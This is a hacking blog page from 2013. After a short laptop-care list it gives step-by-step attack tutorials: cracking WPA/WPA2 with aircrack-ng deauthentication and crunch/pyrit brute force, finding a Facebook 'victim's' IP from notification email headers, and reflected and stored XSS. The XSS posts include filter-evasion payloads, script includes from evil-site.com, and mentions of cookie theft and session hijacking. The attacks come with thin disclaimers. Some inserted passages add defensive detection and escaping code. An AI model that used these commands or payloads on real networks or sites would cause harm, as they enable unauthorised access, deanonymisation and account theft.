Welcome to XnonymouX Blog

Wednesday, 20 February 2013

10 Tips to Keep your Laptop Safe and Healthy

Read more: http://www.callingallgeeks.org/10-tips-to-keep-your-laptop-safe-and-healthy/#ixzz2LS2a9ljg
Under Creative Commons License: Attribution No Derivatives

By on 22:01



1) Keep it clean – using proper cleaning products.  If you want it to last, your laptop needs to be a clean machine. But, don’t go overboard and use harsh cleaning products. Avoid using all-purpose household cleaners, or anything that contains acetone, ammonia, or alcohol.
2) Shut it down properly. If you just close your laptop, you’re not actually shutting it down properly. All software programs, including your operating system, need to be rebooted (restarted) from time to time. Doing this daily is a good practice to keep your computer running at peak performance.
3) Protect it with a case. Bumps and drops are inevitable. You can protect your computer from much (although certainly not all) of the damage caused by these accidents with a case. Cases also create personality, so be creative when you choose yours.
4) Clean up spills immediately. If you spill something on your computer, dry it up right away. I also purchased a plastic cover to protect the keyboard area of my laptop as this prevents spills from getting underneath the keys. Mashable recommends the “rice method” – plopping your computer in a bag of rice after a spill. If you live in a humid area like Florida, it is a good idea to dry out your computer from time to time.
5) Perform updates regularly. We’ve written about this before. It’s incredibly important to perform updates frequently. To learn more, check out: 
6) Don’t work with a cluttered desktop. Having too many files, etc. on your desktop can significantly reduce your computer’s performance.
7) When you install things, pay attention to the boxes you check. Often, you may be inadvertently adding other toolbars and “associated” programs. Avoiding these unwanted additions can be as simple as un-checking a box.
8) Find a decent anti-virus. Malwarebytes, WinAntiVirus, Trend Micro, and Panda are the picks of our development team. Visit those sites to give your computer a checkup.
9) Control the climate. Your laptop shouldn’t become too hot or too cold. One of the most frequent places with extreme climate is the trunk of your car – so avoid leaving your laptop there. If you must, always store it in a computer bag.
10) If you’re storing your computer for more than a few days, make sure you don’t have a full battery.  Chris Murtagh, our resident tech expert, says 50% power is ideal.

Tuesday, 19 February 2013

crack any wifi router without authorization

By on 06:32



Don't crack any wifi router without authorization; otherwise, you will be put in jail.

Step 1 :

airmon-ng

The result will be something like :


Interface    Chipset      Driver
wlan0        Intel 5100   iwlagn - [phy0]


Step 2 :

airmon-ng start wlan0

Step 3 (Optional) :

Change the mac address of the mon0 interface.

ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up

Step 4 :

airodump-ng mon0

Then, press "Ctrl+c" to break the program.


Step 5 :

airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff --ivs mon0

*where -c is the channel
-w is the file to be written
--bssid is the BSSID

Keep this terminal running.


Step 6 :

Open another terminal.

aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0

*where -a is the BSSID
-c is the client MAC address (STATION)

Wait for the handshake.


Step 7 :

Use the John the Ripper word list to crack the WPA/WPA2 password.

aircrack-ng -w /pentest/passwords/john/password.lst wpacrack-01.ivs

Step 8 (Optional) :

If you do not want to use the John the Ripper word list, you can use Crunch.

Go to the official site of crunch.

http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/

Download crunch 3.0 (the current version at the time of this writing).
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download

tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install


/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | aircrack-ng wpacrack-01.ivs -b ff:ff:ff:ff:ff:ff -w - 

*where 8 16 is the length of the password, i.e. from 8 characters to 16 characters.

(B) nVidia Display Card with CUDA

If you have an nVidia card with CUDA, you can use pyrit to crack the password with crunch.

Step a :

airmon-ng

The result will be something like :

Interface    Chipset      Driver
wlan0        Intel 5100   iwlagn - [phy0]



Step b :

airmon-ng start wlan0

Step c (Optional) :

Change the mac address of the mon0 interface.

ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up


Step d :

airodump-ng mon0

Then, press "Ctrl+c" to break the program.


Step e :

airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff mon0

Step f :

Open another terminal.

aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0

*where -a is the BSSID
-c is the client MAC address (STATION)

Wait for the handshake.


Step g :

If the following packages are not yet installed, install them.

apt-get install libghc6-zlib-dev libssl-dev python-dev libpcap-dev python-scapy


Step h :

Go to the official site of crunch.
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/

Download crunch 3.0 (the current version at the time of this writing).
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download

tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install

Step i :

Go to the official site of pyrit.

http://code.google.com/p/pyrit/downloads/list

Download pyrit and cpyrit-cuda (the current version is 0.4.0 at the time of this writing).

tar -xzvf pyrit-0.4.0.tar.gz
cd pyrit-0.4.0
python setup.py build
sudo python setup.py install


tar -xzvf cpyrit-cuda-0.4.0.tar.gz
cd cpyrit-cuda-0.4.0
python setup.py build
sudo python setup.py install


Step j :

/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r wpacrack-01.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough

*where 8 16 is the length of the password, i.e. from 8 characters to 16 characters.


Step k (Optional) :

If you encounter an error when reading wpacrack-01.cap, do the following step.

pyrit -r wpacrack-01.cap -o new.cap stripLive

/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r new.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough

*where 8 16 is the length of the password, i.e. from 8 characters to 16 characters.


Step l :

Then, you will see something similar to the following.

Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Parsing file 'new.cap' (1/1)...
Parsed 71 packets (71 802.11-packets), got 55 AP(s)

Tried 17960898 PMKs so far; 17504 PMKs per second.


Remarks :

If you have an nVidia GeForce GTX460 (336 CUDA cores), the speed of cracking is about 17,000 passwords per second.

To test if your wireless card (either USB or PCI-e) can do the injection or not :

airodump-ng mon0

Open another terminal.

aireplay-ng -9 mon0

Make sure pyrit works on your system :

pyrit list_cores
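
Step 6 (and step f) relies on aireplay-ng's -0 option, which transmits 802.11 deauthentication frames so that the client reconnects. A monitor-mode sensor on the defended network can see that burst. The following is an added example, not part of the original post: it parses raw 802.11 frames (radiotap header already stripped, which is an assumption) and flags BSSID/station pairs that receive several deauthentication frames within a short window. The MAC addresses, threshold, window and sample frames are constructed.

```javascript
// Added example: flag bursts of 802.11 deauthentication frames seen by a monitor-mode sensor.
// Assumption: each frame is a raw 802.11 frame with the radiotap header already stripped.
const DEAUTH = 0xc0; // frame-control byte 0: version 0, type 0 (management), subtype 12

function mac(buf, off) {
  return Array.from(buf.subarray(off, off + 6), b => b.toString(16).padStart(2, "0")).join(":");
}

// Returns null unless the buffer is a complete deauthentication frame.
function parseDeauth(frame) {
  if (frame.length < 26 || frame[0] !== DEAUTH) return null; // 24-byte header + reason code
  return {
    dst: mac(frame, 4),    // addr1: receiver
    src: mac(frame, 10),   // addr2: transmitter (not authenticated, so it can be forged)
    bssid: mac(frame, 16), // addr3
    reason: frame.readUInt16LE(24),
  };
}

// Count deauths per (BSSID, station) inside a sliding window; alert once per pair.
function findDeauthBursts(capture, { threshold = 5, windowSec = 2 } = {}) {
  const recent = new Map();
  const alerts = new Map();
  for (const { ts, frame } of capture) {
    const d = parseDeauth(frame);
    if (!d) continue;
    const station = d.src === d.bssid ? d.dst : d.src; // either direction counts
    const key = `${d.bssid}|${station}`;
    const times = (recent.get(key) || []).filter(t => ts - t <= windowSec);
    times.push(ts);
    recent.set(key, times);
    if (times.length >= threshold && !alerts.has(key)) {
      alerts.set(key, { bssid: d.bssid, station, firstSeen: times[0], count: times.length });
    }
  }
  return [...alerts.values()];
}

// Constructed sample traffic (locally administered MACs, not taken from the post).
function deauthFrame(dst, src, bssid, reason = 7) {
  const hex = m => Buffer.from(m.replace(/:/g, ""), "hex");
  const tail = Buffer.alloc(4); // sequence control (2 bytes) + reason code (2 bytes)
  tail.writeUInt16LE(reason, 2);
  return Buffer.concat([Buffer.from([DEAUTH, 0, 0x3a, 0x01]), hex(dst), hex(src), hex(bssid), tail]);
}
const AP = "02:00:00:00:00:01", STA = "02:00:00:00:00:02", OTHER = "02:00:00:00:00:03";
const SAMPLE = [
  ...[10.0, 10.2, 10.4].map(ts => ({ ts, frame: deauthFrame(STA, AP, AP) })),
  ...[10.1, 10.3, 10.5].map(ts => ({ ts, frame: deauthFrame(AP, STA, AP) })),
  { ts: 40.0, frame: deauthFrame(AP, OTHER, AP, 3) }, // a single ordinary disconnect
  { ts: 41.0, frame: Buffer.from([0x80, 0, 0, 0]) },  // truncated beacon: ignored
].sort((a, b) => a.ts - b.ts);

console.log(findDeauthBursts(SAMPLE));
```

Deauthentication frames are unauthenticated unless 802.11w (Protected Management Frames) is enabled, so the alert identifies the targeted pair, not the sender.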

Note: This tutorial is only for educational purposes. I do not take any responsibility for any misuse; you will be solely responsible for any misuse that you do. Hacking email accounts is criminal activity and is punishable under cyber crime, and you may get up to 40 years of imprisonment if caught doing so.

Trace someone in Facebook

By on 06:29
Hello all my friends. Many people ask how to trace someone on Facebook. Some people think that the noob method with the command prompt is the only method, lol ^_^: closing all tabs, talking to the victim account, then typing "netstat -n". No, no. I found this method in 2011 and it's still working and private, but I decided to share it. Anyway, let me explain it!

This method works with the notifications that you receive in your email. For example, if someone comments on your status or sends you a message on Facebook, you will of course receive the notification in your email!

So you are A and your victim is B. When your victim comments on your thread in Facebook, the Facebook system will record it as A <===========> B.

So where do you find your victim's IP? It's simple: go to your email, open the notification, view the source of the message, press Ctrl+F and search for this:

X-Facebook: from zuckmail

You will find a code like this: ([MTI3LjAuMC4x]). It is encoded in Base64; decode it to ASCII text and you will find the IP of your target. Enj0y!

Tool to decode and encode =========>>> Go Here
For more information, check the first line, x-store-info:

Non Persistent Xss Attack

By on 06:26

Non-persistent XSS flaws are actually the most common vulnerabilities that can be found on the Net. The type is commonly called "non-persistent" because it works on an immediate HTTP response from the victim website: it shows up when the web page takes the data provided by the attacker's client and uses it to automatically generate a result page for the attacker himself. Building on this, the attacker can provide some malicious code and try to get it executed in order to obtain some result.

The most common place for this kind of vulnerability is a website's search engine: the attacker writes some arbitrary HTML code in the search textbox and, if the website is vulnerable, the result page will render that HTML.

Simply put, cross-site scripting involves the injection of malicious code into a website. It is the most common method of attack at the moment, as most large sites will contain at least one XSS vulnerability. However, there is more than one type of XSS. The most commonly found is referred to as "non-persistent" XSS.

Non-Persistent XSS

Non-persistent, as the title suggests, means that the injected script isn't permanent and just appears for the short time the user is viewing the page. The best example of this is a basic coded search engine for a site. Say, for example, the site search script is in this format:

Site.com/search.php?search=text here 

Once something has been searched for, the script may display on the page something along the lines of:

"Results for text here"

This simply echoes your search string straight onto the page without performing any validation checks. What if we were to alter the search string to display HTML or JavaScript? For example:

Site.com/search.php?search=<font color=red>XSS</font> 

Site.com/search.php?search=<script>alert("XSS");</script>

If no sanitization checks are being performed by the search script, this will just be echoed straight onto the page, therefore displaying an alert or red text. If there was no limit to the size, this could be used to display anything you want.

However, since the attacker can only display code on their own pages, this isn't much of a threat to other users. Although if the string was turned into hex, the search string may be slightly more hidden and, with a little deception, could be used to trick users into thinking the link is legitimate.
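
The search page described above, as an added example that is not part of the original post: one renderer echoes the search string as-is, the other HTML-encodes it on output. The function names and the site.example base URL are hypothetical; the inputs are the post's own search strings, including a hex (percent-encoded) form of the link.

```javascript
// Added example: the reflected search page, vulnerable and fixed.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

// Encode the five characters that can change HTML structure in text or attribute context.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, ch => HTML_ESCAPES[ch]);
}

// Hypothetical stand-in for search.php: pull ?search= out of the request URL.
// URL decoding happens here, so a hex-encoded link yields the same string.
function searchTerm(requestUrl) {
  return new URL(requestUrl, "http://site.example").searchParams.get("search") ?? "";
}

// Vulnerable: the search string is echoed straight into the page.
function renderResultsUnsafe(requestUrl) {
  return `<p>Results for ${searchTerm(requestUrl)}</p>`;
}

// Fixed: the same string is HTML-encoded at the point of output.
function renderResultsSafe(requestUrl) {
  return `<p>Results for ${escapeHtml(searchTerm(requestUrl))}</p>`;
}

// Constructed requests using the post's search strings.
const PLAIN_LINK = '/search.php?search=<script>alert("XSS");</script>';
const HEX_LINK = "/search.php?search=%3Cscript%3Ealert(%22XSS%22)%3B%3C%2Fscript%3E";

for (const link of [PLAIN_LINK, HEX_LINK]) {
  console.log("unsafe:", renderResultsUnsafe(link));
  console.log("safe:  ", renderResultsSafe(link));
}
```

The same output encoding applies to values read back from storage, such as a guestbook message or a username.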



Persistent XSS Attack

By on 00:36

Persistent XSS vulnerabilities are similar to the second type (non-persistent XSS), because both work on a victim site and try to hack users' information. The difference is that, on websites vulnerable to persistent XSS, the attacker doesn't need to provide a crafted URL to the users, because the website itself permits users to insert fixed data into the system: this is the case, for example, with "guestbooks". Usually users use that kind of tool to leave messages to the owner of the website, and at first look it doesn't seem dangerous, but if an attacker discovers that the system is vulnerable, he can insert some malicious code in his message and make ALL visitors victims of it.

This works when the tool provided (the guestbook in the example) doesn't do any check on the content of the inserted message: it just inserts the data provided by the user into the result page.

Again, as the name suggests, this is the type of XSS attack the attacker would want to get. Persistent attacks are injected permanently into the code of the site, so anyone who views the site will see them permanently. In order for these to work, the code has to be made to store itself on the site's server somehow, which can be hard to find.

An embarrassing example of this was an XSS vulnerability discovered on this site by one of our users (fixed now, obviously) affecting the page all.php. The registration process wasn't sanitized at all, so all a user had to do was simply register with a username containing HTML or JavaScript code. This was an obvious vulnerability which should have been spotted from the beginning, but just like XSS on other sites it was missed. If not fixed, this vulnerability would affect all.php as well as the forums and anywhere else the username was displayed on the site. A good place to look out for this vulnerability is basic forum scripts that site owners have made themselves or found on sites designed to help novices.

With both of these attacks, it is also possible to run malicious code from another site, again making the possibilities of attack endless. JavaScript has a lot of features that are not well known, such as changing the images on sites through images[number].src, and anyone who uses MySpace will know that CSS can be used to remove or replace certain sections of a site based on name. If you have a permanently vulnerable site, injecting code as simple as the one below will allow you to run XSS off another site.

<SCRIPT SRC=http://evil-site.com/xss.js> </SCRIPT>


Getting Past Basic Protection?

So what if a site owner knows about XSS, but has provided only very little protection against it? Well, this is where CharCode comes in. Char code is basically just a simple form of character encoding that can encode blocked characters so they get past the protection but still get displayed normally on the page. Here is a very common one that will pop up alerts saying "XSS" if the site is vulnerable.

';alert(String.fromCharCode(88,83,83))//\'; alert(String.fromCharCode(88,83,83))//"; alert(String.fromCharCode(88,83,83))//\"; alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT> alert(String.fromCharCode(88,83,83))</SCRIPT>  

This is a very useful XSS to know, as it provides more than one type of attack at once. If you get only one or two alerts, you know that only one or two of them work, so you need to try to eliminate some of them to test which one is affecting the site. The CharCode for "X" is 88 and "S" is 83. As you can see, each provides a slight variation to try to beat character blocking.

XSS could also be hidden in a non-existent image. The code below would run malicious JavaScript disguised as an image.

<img src="javascript:alert('XSS');">

What if quotes are blocked? No problem, just inject the site like so: 

<img src=javascript:alert(&quot;XSS&quot;)>

The &quot; will be interpreted in HTML as a " so the code will run fine. The next one below is very likely to work if you find a site is vulnerable.

<img src=javascript:alert(String.fromCharCode(88,83,83))>

The XSS is hidden in image form and CharCode is being used to display the XSS vulnerability.

Now things get slightly more complicated as we enter ASCII and Unicode. Unicode is just a basic code that was invented to allow all characters to be available to everyone, e.g. for different languages such as Chinese character symbols. And ASCII has a similar purpose. You can go to Click Me to view the HTML code needed for ASCII code. The line below shows the whole code in ASCII form.

<img src=&#106;&#97;&#118;&#97;&#115;&#99; &#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101; &#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> 

As you can tell, this will beat many filters as the code is basically unrecognisable. However, translating the code can display what it was designed to do. Next for Unicode: again, this makes the text unrecognisable but works the same.

<img src=&#0000106&#0000097&#0000118&#0000097 &#0000115&#0000099&#0000114&#0000105&#0000112 &#0000116&#0000058&#0000097&#0000108&#0000101 &#0000114&#0000116&#0000040&#0000039&#0000088 &#0000083&#0000083&#0000039&#0000041> 

If the site has a limited number of characters allowed, this probably won't be useful. As mentioned previously, hex can also be used for XSS. The example below shows this:

<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69 &#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27 &#x58&#x53&#x53&#x27&#x29>

Again unrecognisable which makes it a great XSS to use.

The list of possible XSS attacks is endless and is far more than is covered here. With so many ways to bypass security checks, site owners have to work harder to try to protect their sites. With web forms being used on most sites these days, allowing users to enter code which will be stored somewhere and inevitably viewed by someone else, XSS can be used for almost anything. With practice, XSS can be used to run a hidden cookie stealer which a user will view, allowing you to steal their login info, or, if sessions are used, to perform "session hijacking", where you steal their session data and again log in as them, down to the simple defacement of a website through HTML or JavaScript. XSS is definitely an attack method which should be studied well, as it provides such a common method of attack.

As mentioned above, the list of possible XSS attacks is endless and there isn't enough room to mention them all here, but I will finish with some more XSS examples that may affect a vulnerable site.

<IMG SRC="jav&#x0A;ascript:alert('XSS');"> - new line vulnerability 

 

<iframe src=http://evil-site.com/evil.html < - XSS using an iframe to display a whole new page

 

<SCRIPT>x=/XSS/ alert(x.source)</SCRIPT> - again beat checks using Javascript

 

<BODY BACKGROUND="javascript:alert('XSS')"> - infected body tag

 

<BGSOUND SRC="javascript:alert('XSS');">

 

<LINK REL="stylesheet" HREF="javascript:alert('XSS');"> - stylesheet vulnerability

 

<IMG SRC='vbscript:msgbox("XSS")'> - vbscript, scripting language similar to javascript, again can help beat validation checks

 

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> - incorrectly parsed meta refresh

 

<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html; base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">





- base64 encoding, another form of encryption; this one is less likely to work

 

<SCRIPT SRC="http://evil-site.com/xss.jpg"></SCRIPT> - very sneaky method: here you rename your .js to .jpg, but since you have the script tags it will still be read as a JS file.
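
Why the encoded variants above get past a filter that looks for the literal text "javascript:", and a check that holds up against them, as an added example that is not part of the original post: decode the value the way the HTML and URL parsers will, then allow only known-good schemes. The allowlist, function names and site.example URL are assumptions; the samples are the post's payload rebuilt in each encoding it lists.

```javascript
// Added example: a literal "javascript:" match versus canonicalise-then-allowlist.
const ALLOWED_SCHEMES = new Set(["http", "https"]); // assumed site policy

// The weak filter that the encodings above are meant to slip past.
function naiveFilter(raw) {
  return !/javascript:/i.test(raw);
}

// Decode numeric character references as an HTML parser does: decimal,
// zero-padded decimal and hex, with or without the closing ';'.
function decodeNumericRefs(s) {
  return s.replace(/&#(?:x([0-9a-f]+)|([0-9]+));?/gi, (match, hex, dec) => {
    const cp = hex !== undefined ? parseInt(hex, 16) : parseInt(dec, 10);
    return cp > 0 && cp <= 0x10ffff ? String.fromCodePoint(cp) : "\ufffd";
  });
}

// URL parsers drop tab/CR/LF anywhere and trim leading/trailing controls and spaces.
function canonicalise(raw) {
  return decodeNumericRefs(String(raw))
    .replace(/[\t\r\n]/g, "")
    .replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, "");
}

function isAllowedUrl(raw) {
  const url = canonicalise(raw);
  const scheme = /^([a-z][a-z0-9+.-]*):/i.exec(url);
  if (scheme) return ALLOWED_SCHEMES.has(scheme[1].toLowerCase());
  // No scheme: accept only rooted or dot-relative paths; everything else,
  // including an undecoded named entity in front of ':', fails closed.
  return /^(\/(?![\/\\])|\.{1,2}\/)/.test(url);
}

// Constructed inputs: the post's payload in each of the encodings it lists.
const PAYLOAD = "javascript:alert('XSS')";
const encodeWith = fn => Array.from(PAYLOAD, ch => fn(ch.charCodeAt(0))).join("");
const SAMPLES = {
  plain: PAYLOAD,
  decimal: encodeWith(c => `&#${c};`),
  padded: encodeWith(c => `&#${String(c).padStart(7, "0")}`),
  hex: encodeWith(c => `&#x${c.toString(16).toUpperCase()}`),
  newline: "jav&#x0A;ascript:alert('XSS');",
  vbscript: 'vbscript:msgbox("XSS")',
  dataUri: "data:text/html; base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K",
  image: "https://site.example/img/logo.png",
  relative: "/img/logo.png",
};

// Verdict of both checks for every sample (true = the value would be accepted).
function audit(samples = SAMPLES) {
  return Object.fromEntries(Object.entries(samples).map(([name, raw]) =>
    [name, { naive: naiveFilter(raw), allowlist: isAllowedUrl(raw) }]));
}

console.table(audit());
```

The check belongs on the value after HTML parsing; applied to raw markup it only covers the encodings it knows how to decode, which is why unknown forms are rejected, not passed through.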

The list goes on and on; the best way is to just try them yourself. A lot of the time, incorrectly written HTML code will be the best method. If one way doesn't work, try adding an extra ">" or "<" to the start or end of the code, for example, or view the source of the page for code tags you need to close, adding a "'>" to the end and then starting your own malicious code. Well, that's the end of this tutorial. For more XSS attack examples just use Google, as more of these are being thought up every day. Soon you should even be able to invent your own.
